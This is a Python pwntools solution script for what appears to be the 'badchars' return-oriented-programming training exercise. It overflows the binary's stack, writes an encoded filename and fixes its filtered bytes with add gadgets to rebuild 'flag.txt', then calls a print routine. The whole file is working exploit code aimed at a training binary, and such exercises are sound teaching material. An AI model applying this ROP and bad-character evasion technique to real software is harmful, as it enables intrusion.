#!/usr/bin/env python3
"""ROP-chain solution script for the local ``badchars`` binary (x86_64).

The script spawns ``./badchars``, sends one oversized line that overwrites
the saved return address with a chain of gadget addresses and constants,
waits briefly, and prints whatever the child process writes back.  Every
address below is specific to this one binary; the author's per-gadget notes
are kept as written and only expanded on.

NOTE(review): this is presumably the "badchars" exercise from a public ROP
training set (the name and the byte fix-up pattern match), but that is
inferred from the file, not stated in it.
"""
from pwn import *
from time import sleep

# gotta go FAST
# i'll make it clean when I'm not pressured for time


prog = process('./badchars')
payload = b''
# 40 bytes of filler to reach the saved return address.  The offset is
# presumably taken from a crash / cyclic-pattern run that is not part of
# this file -- re-check it if the binary is rebuilt.
for c in range(40):
    payload += b'a'

# Gadget 1 -- loads four registers from the stack in one go:
#   r12 = the 8-byte string b'fl`f-twt'
#   r13 = 0x601be0  (presumably where the string gets stored; see next gadget)
#   r14 = 1         (increment reused by every "add" gadget below)
#   r15 = 0x601be2  (first byte to fix up)
payload += p64(0x000000000040069c)  # pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
payload += b'fl`f-twt'
payload += p64(0x601be0)
payload += p64(1)
payload += p64(0x601be2)

# Annotated "just pops" by the author.  Given the register setup above
# (r12 = string, r13 = destination) this looks like the store step that
# writes r12 to [r13] -- verify against the disassembly before relying on it.
payload += p64(0x0000000000400634) # just pops

# Gadget 2 -- adds r14 (1) to the memory at r15, i.e. bumps 0x601be2 by one.
payload += p64(0x000000000040062c) # add [r15], r14

# 0x4006a0 is 4 bytes into gadget 1, so presumably its tail
# "pop r14 ; pop r15 ; ret": reload r14 = 1 and retarget r15 = 0x601be3.
payload += p64(0x00000000004006a0) # pops
payload += p64(1)
payload += p64(0x601be3)


payload += p64(0x000000000040062c) # add [r15], r14

# Same fix-up for 0x601be4 ...
payload += p64(0x00000000004006a0) # pops
payload += p64(1)
payload += p64(0x601be4)
payload += p64(0x000000000040062c) # add [r15], r14


# ... and for 0x601be6.  Offsets 2, 3, 4 and 6 of the stored string are each
# incremented by one; offsets 5 and 7 are left alone.  b'fl`f-twt' with those
# four bytes +1 reads as b'flag.txt', so the chain apparently rebuilds a
# filename whose characters the target filters ("bad chars") -- inferred
# from the bytes, not shown by anything in this file.
payload += p64(0x00000000004006a0) # pops
payload += p64(1)
payload += p64(0x601be6)
payload += p64(0x000000000040062c) # add [r15], r14


# First argument (rdi) = address of the now-decoded string.
payload += p64(0x00000000004006a3) # pops rdi
payload += p64(0x601be0)

# Final return target, entered with rdi set above.  Not annotated by the
# author; presumably the binary's routine that prints a named file -- confirm.
payload += p64(0x0000000000400510)


# Explicit line terminator; note sendline() appends another newline of its
# own, so two are sent.  Left exactly as the author wrote it.
payload += b"\n"
prog.sendline(payload)

# Short pause so the child's output has arrived before the single recv().
sleep(0.5)
print(prog.recv())
prog.close()